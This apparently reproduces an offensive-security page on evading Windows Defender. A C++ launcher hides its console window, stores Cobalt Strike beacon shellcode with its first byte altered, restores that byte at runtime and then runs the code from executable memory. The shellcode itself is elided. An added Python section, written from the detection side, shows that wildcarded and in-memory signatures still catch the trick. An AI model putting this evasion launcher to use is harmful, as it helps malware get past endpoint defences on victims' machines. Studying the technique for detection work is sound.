AV evasion: bypassing Windows Defender with a 1-byte change

Bypassing Windows Defender by modifying a single byte

https://www.ired.team/offensive-security/defense-evasion/evading-windows-defender-using-classic-c-shellcode-launcher-with-1-byte-change

#include "stdafx.h"
#include "Windows.h"
#include <cstring>   // memcpy

int main(int argc, char *argv[]) {
    // hide the console window of the launcher
    ::ShowWindow(::GetConsoleWindow(), SW_HIDE);

    // cobalt strike beacon shellcode x64, stored with its first byte
    // changed (0xfc -> 0xfd) so that the on-disk blob no longer matches
    // the signature Defender keys on
    unsigned char shellcode[] = "\xfd\x48\...";
    // the original first byte, restored only at runtime
    char first[] = "\xfc";
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // put the real first byte back, then copy the intact shellcode into
    // the RWX region and jump to it
    memcpy(shellcode, first, 1);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();

    return 0;
}
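Added example (not code from the original post or from ired.team), written from the detection side: a static signature anchored on the exact first byte is exactly what the 1-byte patch above defeats, while a signature that wildcards that byte, or a scan of the bytes as they exist in memory after the memcpy, still fires. The sample bytes are a constructed stand-in that follows the common x64 stager prologue (cld; and rsp,-0x10; call), not the beacon payload the page elides.

```python
import re

# Constructed sample: a typical x64 stager prologue followed by filler.
# It stands in for the shellcode the page elides; it is not a real payload.
ORIGINAL = bytes.fromhex("fc4883e4f0e8c0000000") + b"\x90" * 16
# The page's trick: the blob on disk has its first byte changed (0xfc -> 0xfd).
PATCHED = b"\xfd" + ORIGINAL[1:]

# Naive signature that anchors on the exact first byte (defeated by the patch).
NAIVE_SIG = re.compile(rb"\xfc\x48\x83\xe4\xf0", re.DOTALL)
# More robust signature: wildcard the first byte, key on the rest of the prologue.
ROBUST_SIG = re.compile(rb".\x48\x83\xe4\xf0\xe8", re.DOTALL)


def naive_match(blob: bytes) -> bool:
    return NAIVE_SIG.search(blob) is not None


def robust_match(blob: bytes) -> bool:
    return ROBUST_SIG.search(blob) is not None


def restore_first_byte(blob: bytes, first: bytes = b"\xfc") -> bytes:
    """Mirror of the launcher's memcpy(shellcode, first, 1): the bytes as
    they look in memory right before the RWX region is executed."""
    return first + blob[1:]


def scan(blob: bytes) -> dict:
    """Compare what each detection approach sees on disk and in memory."""
    in_memory = restore_first_byte(blob)
    return {
        "naive_on_disk": naive_match(blob),
        "robust_on_disk": robust_match(blob),
        "naive_in_memory": naive_match(in_memory),
    }


if __name__ == "__main__":
    for name, blob in (("original", ORIGINAL), ("patched", PATCHED)):
        print(name, scan(blob))
```

The patched blob evades only the naive on-disk signature; the wildcarded signature and a memory scan after the byte is restored both still match.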

Result
